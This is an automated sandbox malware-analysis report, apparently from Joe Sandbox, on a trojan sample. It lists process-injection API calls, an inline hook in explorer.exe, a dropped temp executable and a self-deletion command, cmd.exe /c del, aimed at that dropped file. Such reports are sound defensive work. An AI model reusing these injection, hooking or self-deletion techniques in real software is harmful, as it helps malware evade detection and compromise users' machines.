Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A400 NtReadFile,	4_2_0041A400
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A480 NtClose,	4_2_0041A480
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A530 NtAllocateVirtualMemory,	4_2_0041A530
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A34B NtCreateFile,	4_2_0041A34B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A3FA NtReadFile,	4_2_0041A3FA
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A3A2 NtCreateFile,NtReadFile,	4_2_0041A3A2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A47F NtClose,	4_2_0041A47F
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041A52A NtAllocateVirtualMemory,	4_2_0041A52A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602B60 NtClose,LdrInitializeThunk,	4_2_01602B60
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_01602BF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602AD0 NtReadFile,LdrInitializeThunk,	4_2_01602AD0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602D30 NtUnmapViewOfSection,LdrInitializeThunk,	4_2_01602D30
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602D10 NtMapViewOfSection,LdrInitializeThunk,	4_2_01602D10
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01602DF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602DD0 NtDelayExecution,LdrInitializeThunk,	4_2_01602DD0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01602C70
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602CA0 NtQueryInformationToken,LdrInitializeThunk,	4_2_01602CA0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602F30 NtCreateSection,LdrInitializeThunk,	4_2_01602F30
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602FE0 NtCreateFile,LdrInitializeThunk,	4_2_01602FE0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602FB0 NtResumeThread,LdrInitializeThunk,	4_2_01602FB0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602F90 NtProtectVirtualMemory,LdrInitializeThunk,	4_2_01602F90
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_01602EA0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602E80 NtReadVirtualMemory,LdrInitializeThunk,	4_2_01602E80
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01604340 NtSetContextThread,	4_2_01604340
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01604650 NtSuspendThread,	4_2_01604650
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602BE0 NtQueryValueKey,	4_2_01602BE0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602BA0 NtEnumerateValueKey,	4_2_01602BA0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602B80 NtQueryInformationFile,	4_2_01602B80
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602AF0 NtWriteFile,	4_2_01602AF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602AB0 NtWaitForSingleObject,	4_2_01602AB0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602D00 NtSetInformationFile,	4_2_01602D00
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602DB0 NtEnumerateKey,	4_2_01602DB0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602C60 NtCreateKey,	4_2_01602C60
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602C00 NtQueryInformationProcess,	4_2_01602C00
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602CF0 NtOpenProcess,	4_2_01602CF0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602CC0 NtQueryVirtualMemory,	4_2_01602CC0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602F60 NtCreateProcessEx,	4_2_01602F60
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602FA0 NtQuerySection,	4_2_01602FA0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602E30 NtWriteVirtualMemory,	4_2_01602E30
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01602EE0 NtQueueApcThread,	4_2_01602EE0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01603010 NtOpenDirectoryObject,	4_2_01603010
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01603090 NtSetValueKey,	4_2_01603090
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016035C0 NtCreateMutant,	4_2_016035C0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_016039B0 NtGetContextThread,	4_2_016039B0
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01603D70 NtOpenThread,	4_2_01603D70
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_01603D10 NtOpenProcessToken,	4_2_01603D10
Source: C:\Windows\explorer.exe	Code function: 5_2_10B4F232 NtCreateFile,	5_2_10B4F232
Source: C:\Windows\explorer.exe	Code function: 5_2_10B50E12 NtProtectVirtualMemory,	5_2_10B50E12
Source: C:\Windows\explorer.exe	Code function: 5_2_10B50E0A NtProtectVirtualMemory,	5_2_10B50E0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432C60 NtCreateKey,LdrInitializeThunk,	6_2_04432C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04432C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04432CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_04432D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432DD0 NtDelayExecution,LdrInitializeThunk,	6_2_04432DD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04432DF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_04432EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432F30 NtCreateSection,LdrInitializeThunk,	6_2_04432F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432FE0 NtCreateFile,LdrInitializeThunk,	6_2_04432FE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432AD0 NtReadFile,LdrInitializeThunk,	6_2_04432AD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432B60 NtClose,LdrInitializeThunk,	6_2_04432B60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_04432BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04432BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044335C0 NtCreateMutant,LdrInitializeThunk,	6_2_044335C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04434650 NtSuspendThread,	6_2_04434650
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04434340 NtSetContextThread,	6_2_04434340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432C00 NtQueryInformationProcess,	6_2_04432C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432CC0 NtQueryVirtualMemory,	6_2_04432CC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432CF0 NtOpenProcess,	6_2_04432CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432D00 NtSetInformationFile,	6_2_04432D00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432D30 NtUnmapViewOfSection,	6_2_04432D30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432DB0 NtEnumerateKey,	6_2_04432DB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432E30 NtWriteVirtualMemory,	6_2_04432E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432EE0 NtQueueApcThread,	6_2_04432EE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432E80 NtReadVirtualMemory,	6_2_04432E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432F60 NtCreateProcessEx,	6_2_04432F60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432F90 NtProtectVirtualMemory,	6_2_04432F90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432FA0 NtQuerySection,	6_2_04432FA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432FB0 NtResumeThread,	6_2_04432FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432AF0 NtWriteFile,	6_2_04432AF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432AB0 NtWaitForSingleObject,	6_2_04432AB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432B80 NtQueryInformationFile,	6_2_04432B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04432BA0 NtEnumerateValueKey,	6_2_04432BA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04433010 NtOpenDirectoryObject,	6_2_04433010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04433090 NtSetValueKey,	6_2_04433090
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04433D70 NtOpenThread,	6_2_04433D70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04433D10 NtOpenProcessToken,	6_2_04433D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_044339B0 NtGetContextThread,	6_2_044339B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A350 NtCreateFile,	6_2_0013A350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A400 NtReadFile,	6_2_0013A400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A480 NtClose,	6_2_0013A480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A530 NtAllocateVirtualMemory,	6_2_0013A530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A34B NtCreateFile,	6_2_0013A34B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A3A2 NtCreateFile,NtReadFile,	6_2_0013A3A2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A3FA NtReadFile,	6_2_0013A3FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A47F NtClose,	6_2_0013A47F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013A52A NtAllocateVirtualMemory,	6_2_0013A52A

Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Section loaded: icuuc.dll			Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Section loaded: icuin.dll			Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\xheuzyg.exe B5D248548FAEDE30D47AA97B068B3BD63D39EA0C69D965FEE54AD1ACCF51495B

Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe	ReversingLabs: Detection: 57%
Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Jump to behavior

Source: SecuriteInfo.com.FileRepMalware.16340.31219.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe "C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe

File created: C:\Users\user\AppData\Local\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\LocalCache\RNManualFileCache

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsl91E7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/3@12/8

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Code function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,

0_2_00402053

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

Code function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004042C1

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6520:120:WilError_03

Binary or memory string: __d(function(e,o,r,a){var n,t=o(292),i=t.NativeModules,s=(t.Platform,i.RNCookieManagerIOS,i.RNCookieManagerAndroid,i.RNCookieManagerWindows);o(1816)(s,"Add a reference to RNCookieManager.csproj in your project"),n=s;var l=["set","setFromResponse","get","getAll","clearAll"];r.exports={};for(var d=0;d<l.length;d++)r.exports[l[d]]=n[l[d]]},1815);

Source:	Binary string: wntdll.pdbUGP source: xheuzyg.exe, 00000002.00000003.1228223743.000000001DE10000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000002.00000003.1227185095.000000001DFB0000.00000004.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: xheuzyg.exe, xheuzyg.exe, 00000004.00000002.1286241915.000000000172E000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1231900300.00000000013E4000.00000004.00000020.00020000.00000000.sdmp, xheuzyg.exe, 00000004.00000003.1229286963.0000000001234000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000006.00000003.1289145388.0000000004218000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.000000000455E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1286865129.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3710698216.00000000043C0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: rundll32.pdb source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: xheuzyg.exe, 00000004.00000002.1286179428.0000000001550000.00000040.10000000.00040000.00000000.sdmp, xheuzyg.exe, 00000004.00000002.1285918068.0000000001138000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3709614630.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B0C26 push ecx; ret	2_2_001B0C39
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001B06C9 push ecx; ret	2_2_001B06DC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 2_2_001C972C push eax; ret	2_2_001C974A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B0C26 push ecx; ret	4_2_001B0C39
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001B06C9 push ecx; ret	4_2_001B06DC
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_001C972C push eax; ret	4_2_001C974A
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00416839 push edi; retf	4_2_0041683B
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041EA4F push edx; ret	4_2_0041EA51
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00417A78 pushfd ; iretd	4_2_00417A81
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041EABD pushfd ; retn 0000h	4_2_0041EAC7
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041D4F2 push eax; ret	4_2_0041D4F8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041D4FB push eax; ret	4_2_0041D562
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041D4A5 push eax; ret	4_2_0041D4F8
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_0041D55C push eax; ret	4_2_0041D562
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_004176AF pushfd ; ret	4_2_004176BE
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00416FDA push FFFFFFA3h; ret	4_2_00416FF2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_00416FE0 push FFFFFFA3h; ret	4_2_00416FF2
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Code function: 4_2_015C09AD push ecx; mov dword ptr [esp], ecx	4_2_015C09B6
Source: C:\Windows\explorer.exe	Code function: 5_2_10B529B5 push esp; retn 0000h	5_2_10B52AE7
Source: C:\Windows\explorer.exe	Code function: 5_2_10B52B1E push esp; retn 0000h	5_2_10B52B1F
Source: C:\Windows\explorer.exe	Code function: 5_2_10B52B02 push esp; retn 0000h	5_2_10B52B03
Source: C:\Windows\explorer.exe	Code function: 5_2_111E99B5 push esp; retn 0000h	5_2_111E9AE7
Source: C:\Windows\explorer.exe	Code function: 5_2_111E9B1E push esp; retn 0000h	5_2_111E9B1F
Source: C:\Windows\explorer.exe	Code function: 5_2_111E9B02 push esp; retn 0000h	5_2_111E9B03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_043F09AD push ecx; mov dword ptr [esp], ecx	6_2_043F09B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00136839 push edi; retf	6_2_0013683B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013EA4F push edx; ret	6_2_0013EA51
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013EABD pushfd ; retn 0000h	6_2_0013EAC7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00136FDA push FFFFFFA3h; ret	6_2_00136FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_00136FE0 push FFFFFFA3h; ret	6_2_00136FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0013D4A5 push eax; ret	6_2_0013D4F8

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_001A2015 std::exception::exception,_wmemset,std::locale::_Getfacet,ctype,messages,std::system_error::system_error,LoadLibraryA,GetProcAddress,GetConsoleWindow,ShowWindow,VirtualAlloc,EnumSystemCodePagesW,

2_2_001A2015

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe

File created: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE8

Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe

Code function: 2_2_001AFA47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_001AFA47

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xheuzyg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
